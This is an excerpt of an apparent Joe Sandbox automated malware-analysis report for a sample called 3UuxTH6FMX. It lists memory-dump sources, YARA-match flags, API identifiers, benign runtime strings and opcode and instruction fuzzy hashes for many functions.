                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3936042273-0
                                                                                                                                                                  • Opcode ID: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
                                                                                                                                                                  • Instruction ID: 835ca0f9098171f666fd59bb41241b4a9ee9e2660e11e079d0a6c1ab9c9988ed
                                                                                                                                                                  • Opcode Fuzzy Hash: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
                                                                                                                                                                  • Instruction Fuzzy Hash: 8551F562B0A681D5FE16AB11F1143BDF2A1EB04BD4FAA4571DB5C0B7A5EE3DD8828310
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentInitStringStringsUnicode$Free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2488768755-0
                                                                                                                                                                  • Opcode ID: f0ba7188dc1db7b6fdd8a6b732626966757021621c6983e9daedbd6d1f4ccadb
                                                                                                                                                                  • Instruction ID: d680604f23a15dcbb0d448e54ef8d9cca3fa72e6833a515861289665545268b9
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ba7188dc1db7b6fdd8a6b732626966757021621c6983e9daedbd6d1f4ccadb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2351BD36A18B80C2EB248F19F48439D7760F7A8B98F589211EB9C43B95DF78D6E1C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3698853521-0
                                                                                                                                                                  • Opcode ID: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
                                                                                                                                                                  • Instruction ID: 6d9543c22fea932f978e8d0b9ff5a0b8ff242ff93e29f7a9a031ec649aaf7b97
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
                                                                                                                                                                  • Instruction Fuzzy Hash: 38419532218B5081EB10DF25E8D83DD77A4F7A8B98F555522EA9D837A5DF38CA86C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
                                                                                                                                                                  • Instruction ID: 3b38105d51a120e9037583d95edae6a19ae58c94215cac254206e785efa4baf9
                                                                                                                                                                  • Opcode Fuzzy Hash: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C41637610DA84C6EB52DF24C4983ED3FE0E769F88F498452C6998738ADE3DCA45C712
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1168246061-0
                                                                                                                                                                  • Opcode ID: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
                                                                                                                                                                  • Instruction ID: 687096e4d9ef538bd1639b0a94c19036083f70e8020aa774219427c8d6ba5e54
                                                                                                                                                                  • Opcode Fuzzy Hash: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
                                                                                                                                                                  • Instruction Fuzzy Hash: A8418272218E5080EA11DB25E4D83ED7760F7A8B9CF585121AA8D877A6DF38CA82C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1168246061-0
                                                                                                                                                                  • Opcode ID: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
                                                                                                                                                                  • Instruction ID: bf4b63e92993776c242051cc7acf3d29e36e421185f0d977f0ff27407d09289e
                                                                                                                                                                  • Opcode Fuzzy Hash: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
                                                                                                                                                                  • Instruction Fuzzy Hash: 00419636208A5084FA15DB15E4D83ED7764F7A4B9CF5C0212DA8D877A6EF3CCA92C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1168246061-0
                                                                                                                                                                  • Opcode ID: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
                                                                                                                                                                  • Instruction ID: 6c06f7ebbe954513e31aebe2d69225d21c7b823dfa388970e52828edfcaa34de
                                                                                                                                                                  • Opcode Fuzzy Hash: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 7041B432218A50C5FA15DB25E4D83EE7760F764B98F180512EA9D877A5DF38CB86C704
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1168246061-0
                                                                                                                                                                  • Opcode ID: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
                                                                                                                                                                  • Instruction ID: ace2050ae7c978c74d22b0e480e647a0ecdb9cdf2407efbbbb7381de00b42a3b
                                                                                                                                                                  • Opcode Fuzzy Hash: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
                                                                                                                                                                  • Instruction Fuzzy Hash: 82418271218A5080EA15DB15E8D83EE6764F7B8B98F180522DA8D877A5DE38CB86C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1168246061-0
                                                                                                                                                                  • Opcode ID: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
                                                                                                                                                                  • Instruction ID: f751f8d3d66878b0fbbb89b16b7c6a35a6471aeb8f5beace2a47d727e1a47059
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
                                                                                                                                                                  • Instruction Fuzzy Hash: 36418121A0AA42D1FA16BF15F440279B3B0FB58B94F9A0176EB5D076B5CF3CE0478320
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 203985260-0
                                                                                                                                                                  • Opcode ID: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
                                                                                                                                                                  • Instruction ID: 3a4569eb80f65e842f761da1edaef5c1ae9d4e8ede9a86331e5006f8cf160946
                                                                                                                                                                  • Opcode Fuzzy Hash: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
                                                                                                                                                                  • Instruction Fuzzy Hash: 74213B72618B9487F3108F25E49875EB7B4F799BD8F240128DB8997B64DF39C9428B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 156590933-0
                                                                                                                                                                  • Opcode ID: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
                                                                                                                                                                  • Instruction ID: 0dafca9c7bc4a8375d87b981ab77e0607df386fa6c88093cc7c813b1678866c5
                                                                                                                                                                  • Opcode Fuzzy Hash: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
                                                                                                                                                                  • Instruction Fuzzy Hash: B7118F31A1C65055FB504B35A0EC3AE67A1EBA47F8F141610AAB7C6FF4DE38C6828B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                  • Opcode ID: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
                                                                                                                                                                  • Instruction ID: f6c28fb42156a805855edbb9a5a21dc0b6d0da354e990b141323e06661aa2920
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 77118826B16F01CAFB409F60E8942B873B4FB19758F850E35DA6D86BA4DF7CD05583A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [json.exception.
                                                                                                                                                                  • API String ID: 0-791563284
                                                                                                                                                                  • Opcode ID: f12e5e6bab6da389f838604e2b5236ca074fa8d1cbcc49ddefe9ceb58e17403c
                                                                                                                                                                  • Instruction ID: bf04a28c6d94105a8c52675635280e36034c28b1cd639c3ac56c7a1cee6ca426
                                                                                                                                                                  • Opcode Fuzzy Hash: f12e5e6bab6da389f838604e2b5236ca074fa8d1cbcc49ddefe9ceb58e17403c
                                                                                                                                                                  • Instruction Fuzzy Hash: 25712472B14B9085F700CF79E8943DD3BA1EBA5B98F505215DE5957B8ACF78CA81C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 3988782225-1405518554
                                                                                                                                                                  • Opcode ID: 409f49d01fef858ffdbd088741ae0195d110fd44b0516afdb47a575a18fd2010
                                                                                                                                                                  • Instruction ID: cfd853af4ef535683e30c4d1263cc70e876d139cc05105bc05f2e25069535ccd
                                                                                                                                                                  • Opcode Fuzzy Hash: 409f49d01fef858ffdbd088741ae0195d110fd44b0516afdb47a575a18fd2010
                                                                                                                                                                  • Instruction Fuzzy Hash: 90514C32709A808AFB14DF70D4943ED33A4EB64B4CF484435EA4DA7A95CE34CA559345
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 3988782225-1405518554
                                                                                                                                                                  • Opcode ID: 5b236c7c7a2f26e7d10c1437b2e4c569ca43ec723a046ab1c85b9be404552392
                                                                                                                                                                  • Instruction ID: 5203211e9f698091cd5346b5194cb679484930085cb9bdc0677ac640b0f0d576
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b236c7c7a2f26e7d10c1437b2e4c569ca43ec723a046ab1c85b9be404552392
                                                                                                                                                                  • Instruction Fuzzy Hash: 64514D36309A80DAFB14DF70E4943EC33A4FB6474CF444525EA49A7AA5DE34CA66D305
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                  • Opcode ID: ee72351df311ff027eaf8af198dd50b8868fef75caf7a1d708de55c1de70a8ab
                                                                                                                                                                  • Instruction ID: 5d311d7e5b11b639a5877ab50af17dc4e0dd8f5953bd5f420b3ffee04c04aeac
                                                                                                                                                                  • Opcode Fuzzy Hash: ee72351df311ff027eaf8af198dd50b8868fef75caf7a1d708de55c1de70a8ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 6141EB3260C78046FB649B26E4997ED6790E7A0BACF144625EED887AD5DE38CE41C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                  • Opcode ID: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
                                                                                                                                                                  • Instruction ID: 251d93c5a0aceec59a9d4e9ccf7ab1fe2896a969e72bb2fd5010743b9af5c00e
                                                                                                                                                                  • Opcode Fuzzy Hash: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
                                                                                                                                                                  • Instruction Fuzzy Hash: AA41B572319A8086EB20CF65E4987EDA7A4F7A8788F404421EE4DC7B94DF3CCA41CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                  • String ID: Number is too big.
                                                                                                                                                                  • API String ID: 1132134225-3173473636
                                                                                                                                                                  • Opcode ID: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
                                                                                                                                                                  • Instruction ID: 5c10b9e26a9bed4705db80f4908f76a0afd28b85a26db0db81a34884fb5f372b
                                                                                                                                                                  • Opcode Fuzzy Hash: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E1121A2C092479FFE4B3670D45A2F9A720EF61211FD20EB8E268059B3FE1D36074760
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                  • String ID: Number is too big.
                                                                                                                                                                  • API String ID: 1132134225-3173473636
                                                                                                                                                                  • Opcode ID: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
                                                                                                                                                                  • Instruction ID: 7b89e5cb8c811ebc5abcce8f30e871afe23db8fd79617ee0f150b9a830e60168
                                                                                                                                                                  • Opcode Fuzzy Hash: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
                                                                                                                                                                  • Instruction Fuzzy Hash: 6711933290D247DFF212BB78D44A5ADBE609F01644FB54EB9D7A8428A3DE0D70828311
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                  • Opcode ID: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
                                                                                                                                                                  • Instruction ID: 8d50e42217523aec54a976f5657ab48e22a043f0814d7f1098749358333e7f37
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
                                                                                                                                                                  • Instruction Fuzzy Hash: FE110036618B8482EB618F15F48429D77E5F798B98F584225EECD47B58DF3CCA51C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AA101E0F), ref: 00007FF7AA12EDF4
                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AA101E0F), ref: 00007FF7AA12EE35
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                  • Opcode ID: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
                                                                                                                                                                  • Instruction ID: a326354d565bd33bbc2f0e0259937682010214486e25479cdfa15d6122ffd81b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
                                                                                                                                                                  • Instruction Fuzzy Hash: D4117C32619B40C2EB619F15F404269BBE4FB88B84F994670EE8C07764DF3CC516C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                  • String ID: String pointer is null.
                                                                                                                                                                  • API String ID: 1132134225-696828624
